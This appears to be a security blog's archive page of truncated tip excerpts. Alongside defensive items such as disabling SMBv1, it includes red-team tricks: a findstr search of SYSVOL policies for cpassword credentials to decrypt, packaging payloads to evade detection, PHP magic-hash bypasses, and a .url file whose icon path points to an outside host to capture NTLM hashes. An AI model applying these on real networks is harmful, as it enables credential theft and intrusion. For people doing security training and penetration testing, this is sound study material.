by frank | Jun 28, 2019 | Blue Team, Red team, Security, Windows
Reading Time: < 1 minuteecho %logonserver% findstr /S /I cpassword \\xxDC01\sysvol\xxxdc01\policies*.xml crack cpassword with the default AES key...
by frank | Jun 28, 2019 | Misc, Red team, Security, Windows
pyinstaller -i toto.ico -w -F toto.py Medium article : https://medium.com/dreamcatcher-its-blog/making-an-stand-alone-executable-from-a-python-script-using-pyinstaller-d1df9170e263 Another one which I don’t agree, as yes, payload is undetected by execute will...
by frank | Jun 28, 2019 | Red team, Security, Windows
Analyse Windows Systeminfo output, and produce a lit of the vulnerabilities and possible only show which ones have exploitspython wesng.py –exploits-only...
by frank | Jun 28, 2019 | Misc, Security, Windows
Reading Time: < 1 minuteIn the olden days, we did for example telnet mailserver 110, and then we could get the combination of username/password or other checks.With all being TLS/SSL, here is a way to do the way but with a TLS underlay.openssl s_client -connect...
by frank | Jun 28, 2019 | Blue Team, Security, Windows
Reading Time: < 1 minuteTime to disable SMBv1 ! https://support.microsoft.com/en-gb/help/2696547/detect-enable-disable-smbv1-smbv2-smbv3-in-windows-and-windows-server Win 8 : Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol Win10 :...
by frank | Jun 28, 2019 | Security, Windows
Reading Time: < 1 minutenltest /trusted_domains will produce the list of trusted domains and the relationship of the trust (birectionnal and so on...
by frank | Jun 28, 2019 | Security
Reading Time: < 1 minutewhen there is a cluster in SEPPMail The config sync is done via SSH with a Public Key. The username used is the clusterID If you need to connect to a device, use the key to...
by frank | Jun 28, 2019 | CTF, Security
Reading Time: < 1 minuteFor PHP Loose comparison240610708 = 0e462097431906509019562988736854ximaz = 61529519452809720693702583126814 Other Magic hashes web site :...
by frank | Jun 28, 2019 | CTF, Security
Reading Time: < 1 minuteif == strcomp then replace with array=[]if String, replace with true All == should be replace with === to be sure to keep the type of...
by frank | Jun 28, 2019 | Red team, Security, Windows
Reading Time: < 1 minutegenerate a file toto.url with the following content [InternetShortcut] URL=https://www.google.com/ IconIndex=0 IconFile=\\1.2.3.4\leak\leak.ico Place the toto.url file on a sharedrive. Many workstations will try to get the ico...
Recent Comments